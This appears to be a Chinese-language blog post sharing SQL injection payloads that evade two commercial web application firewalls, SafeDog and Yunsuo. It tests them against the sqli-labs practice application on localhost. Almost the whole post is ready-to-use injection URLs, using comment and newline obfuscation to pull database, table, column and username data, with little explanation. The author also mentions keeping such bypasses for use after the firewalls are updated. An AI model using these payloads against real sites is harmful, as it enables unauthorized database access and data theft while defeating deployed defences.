前言

可能会持续更新,也许吧谁知道呢

1
2
3
4
5
6
7
emmmm,
  直发payload好了,反正过程又没什么好说的。(主要是没有什么技术含量
  环境:
  安全狗:4.0(apache官网最新版)/云锁:反正就是官网最新下载的/D盾:同新
  Mysql: 5.7.26
  php: phpstudy8.0(php5.6)
  *注:* 安全狗开启了"非法访问information_schema数据库"项,最新版默认不开启,但是窝给开启了!(不开启该项还是挺好绕的,逃

锤狗篇

就,绕嘛。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
获取数据库名:
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20all--+x%0Aselect%201,2,database/*!00000()*/--+

获取表名:
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20all--+x%0Aselect%201,2,group_concat(table_name)from%20sys.schema_auto_increment_columns%20where%20table_schema=database/*!/*%23*/*/()--+

获取字段名:
http://localhost/sqli-labs/Less-1/?id=-1%27union%20all--+x%0Aselect%20*%20from%20(select%20*%20from--+a%0Ausers%20as%20a%20join%20users%20b)c--+
&&
http://localhost/sqli-labs/Less-1/?id=-1%27union%20all--+x%0Aselect%20*%20from%20(select%20*%20from--+a%0Ausers%20as%20a%20join%20users%20b%20using(id))c--+

获取数据:
http://localhost/sqli-labs/Less-1/?id=-1%27union%20all--+x%0Aselect%201,2,group_concat(username)--+x%0Afrom%20users--+

效果,就那样吧


开锁篇

和安全狗的规则差别还是挺大的

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
获取字段数:
http://localhost/sqli-labs/Less-1/?id=1%27%20order/*!00000by*/3--+

获取数据库名:
http://localhost/sqli-labs/Less-1/?id=-1%27%20union%20/*!00000all%20select*/%201,2,database/**/()--+

获取表名(搞了个牛逼的payload,其实就是很简洁,但是私藏了~):
http://localhost/sqli-labs/Less-1/?id=-1%27union/*!00000all*//*!00000select+1,2,group_concat(table_name)*/from%20information_schema.tables%20where%20table_schema=database()--+

获取字段名:
http://localhost/sqli-labs/Less-1/?id=-1%27union/*!00000all*//*!00000select%201,2,group_concat(column_name)from%20information_schema.columns%20where%20table_name=%27users%27*/--+

获取数据:
http://localhost/sqli-labs/Less-1/?id=-1%27%20union/*!00000all*//*!00000select%201,2,group_concat(username)*/from%20users--+

看图


破盾篇

配了个iis服务器配了好久,老子不搞了,等找到集成环境 or 哪天心情好配置好了环境再更吧。推荐一下chabug的@level师傅的文章。

我level表哥的破盾大法

最终

总结了一些过waf的payload,搞了个合集,相信各位大表哥也都会,想了想扔chabug核心群里了。没啥技术含量,留着waf更新后用吧,省着再浪费时间去搞。

文章更新的速度真低,我的初衷不是这样的啊(逃。